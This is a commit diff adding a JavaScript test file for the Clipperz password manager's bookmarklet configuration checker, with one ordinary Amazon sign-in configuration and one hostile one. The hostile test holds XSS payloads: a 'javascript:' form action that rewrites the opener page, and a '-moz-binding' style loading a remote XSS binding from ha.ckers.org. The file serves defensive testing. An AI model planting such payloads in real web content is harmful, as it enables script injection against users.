summaryrefslogtreecommitdiff
path: root/frontend/gamma/tests/tests/Clipperz/PM/BookmarkletProcessor.test.js
Side-by-side diff
Diffstat (limited to 'frontend/gamma/tests/tests/Clipperz/PM/BookmarkletProcessor.test.js') (more/less context) (ignore whitespace changes)
-rw-r--r--frontend/gamma/tests/tests/Clipperz/PM/BookmarkletProcessor.test.js132
1 files changed, 132 insertions, 0 deletions
diff --git a/frontend/gamma/tests/tests/Clipperz/PM/BookmarkletProcessor.test.js b/frontend/gamma/tests/tests/Clipperz/PM/BookmarkletProcessor.test.js
new file mode 100644
index 0000000..21776a3
--- a/dev/null
+++ b/frontend/gamma/tests/tests/Clipperz/PM/BookmarkletProcessor.test.js
@@ -0,0 +1,132 @@
+/*
+
+Copyright 2008-2011 Clipperz Srl
+
+This file is part of Clipperz's Javascript Crypto Library.
+Javascript Crypto Library provides web developers with an extensive
+and efficient set of cryptographic functions. The library aims to
+obtain maximum execution speed while preserving modularity and
+reusability.
+For further information about its features and functionalities please
+refer to http://www.clipperz.com
+
+* Javascript Crypto Library is free software: you can redistribute
+ it and/or modify it under the terms of the GNU Affero General Public
+ License as published by the Free Software Foundation, either version
+ 3 of the License, or (at your option) any later version.
+
+* Javascript Crypto Library is distributed in the hope that it will
+ be useful, but WITHOUT ANY WARRANTY; without even the implied
+ warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ See the GNU Affero General Public License for more details.
+
+* You should have received a copy of the GNU Affero General Public
+ License along with Javascript Crypto Library. If not, see
+ <http://www.gnu.org/licenses/>.
+
+*/
+
+function testBookmarkletConfigurationString (aConfiguration, shouldFail, aMessage) {
+// var configuration;
+
+//try {
+// configuration = Clipperz.Base.evalJSON(aConfiguration);
+//} catch (exception) {
+// console.log("EXCEPTION", exception);
+// throw exception;
+//}
+
+//console.log("configuration", configuration);
+
+ if (shouldFail == true) {
+ try {
+ Clipperz.PM.BookmarkletProcessor.checkBookmarkletConfiguration(aConfiguration);
+ SimpleTest.ok(false, "vulnerability not caught - " + aMessage);
+ } catch(exception) {
+ SimpleTest.ok(true, "vulnerability correctly caught - " + aMessage);
+ }
+ } else {
+ try {
+ Clipperz.PM.BookmarkletProcessor.checkBookmarkletConfiguration(aConfiguration);
+ SimpleTest.ok(true, "configuration correctly checked - " + aMessage);
+ } catch(exception) {
+ SimpleTest.ok(false, "configuration wrongly caught as malicious - " + aMessage);
+// console.log(exception);
+ }
+ }
+}
+
+//#############################################################################
+
+var tests = {
+
+ //-------------------------------------------------------------------------
+
+ 'simpleAmazonConfiguration_test': function () {
+ var bookmarkletConfigurationString;
+
+ bookmarkletConfigurationString = "{"+
+ "\"page\": {\"title\": \"Sign In\"},\n" +
+ "\"form\": {" +
+ "\"attributes\": {" +
+ "\"action\": \"https://www.amazon.com/gp/flex/sign-in/select.html\",\n" +
+ "\"method\": \"post\"" +
+ "},\n" +
+ "\"inputs\": [" +
+ "{\"type\": \"hidden\",\n\"name\": \"path\",\n\"value\": \"/gp/yourstore\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"useRedirectOnSuccess\",\n\"value\": \"1\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"query\",\n\"value\": \"signIn=1&action=sign-out&useRedirectOnSuccess=1&path=/gp/yourstore&ref_=pd_irl_gw_r\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"mode\",\n\"value\": \"\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"redirectProtocol\",\n\"value\": \"\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"pageAction\",\n\"value\": \"/gp/yourstore\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"disableCorpSignUp\",\n\"value\": \"\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"protocol\",\n\"value\": \"https\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"sessionId\",\n\"value\": \"105-1479357-7902864\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"referer\",\n\"value\": \"flex\"},\n" +
+ "{\"type\": \"text\",\n\"name\": \"email\",\n\"value\": \"\"},\n" +
+ "{\"type\": \"password\",\n\"name\": \"password\",\n\"value\": \"\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"metadata1\",\n\"value\": \"Firefox 3.0.3 Mac\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"metadataf1\",\n\"value\": \"\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"metadata2\",\n\"value\": \"Default Plug-in Java Embedding Plugin 0.9.6.4 Shockwave Flash 90124RealPlayer Plugin QuickTime Plug-in 7.5.5 Flip4Mac Windows Media Plugin 2.2 4||1440-900-878-24-*-*-*\"},\n" +
+ "{\"type\": \"hidden\",\n\"name\": \"metadata3\",\n\"value\": \"timezone: -1 execution time: 3\"},\n" +
+ "{\"name\": \"action\",\n\"type\": \"radio\",\n\"options\": [" +
+ "{\"value\": \"new-user\",\n\"checked\": false},\n" +
+ "{\"value\": \"sign-in\",\n\"checked\": true}" +
+ "]}" +
+ "]" +
+ "},\n" +
+ "\"version\": \"0.2.3\"" +
+ "}";
+ testBookmarkletConfigurationString(bookmarkletConfigurationString, false, "regular Amazon.com configuration");
+ },
+
+ //-------------------------------------------------------------------------
+
+ 'hackedConfigurationWithXSSAttackVectorReadyToBeTriggeredWhenActivatingTheDirectLogin_test': function () {
+ var bookmarkletConfigurationString;
+
+ bookmarkletConfigurationString = "{" +
+ "\"page\": {\"title\": \"Example Attack\"}," +
+ "\"form\": { " +
+ "\"attributes\": { " +
+ "\"action\": \"javascript:opener.document.body.innerHTML = 'hacked!';close();\", " +
+ "\"style\": \"-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')\", " +
+ "\"method\": null " +
+ "}, " +
+ "\"inputs\": [" +
+ "{\"type\": \"text\", \"name\": \"username\", \"value\": \"\"}, " +
+ "{\"type\": \"password\", \"name\": \"password\", \"value\": \"\"}" +
+ "]" +
+ "}," +
+ "\"version\": \"0.2.3\" " +
+ "}";
+ testBookmarkletConfigurationString(bookmarkletConfigurationString, false, "hacked configuration that is trying to inject a XSS attack vector. It should not fail, as it is responsability of the direct login to avoid triggering such attack vector");
+ },
+
+ //-------------------------------------------------------------------------
+ 'syntaxFix': MochiKit.Base.noop
+}
+
+//#############################################################################
+
+SimpleTest.runDeferredTests("Clipperz.PM.BookmarkletProcessor", tests, {trace:false});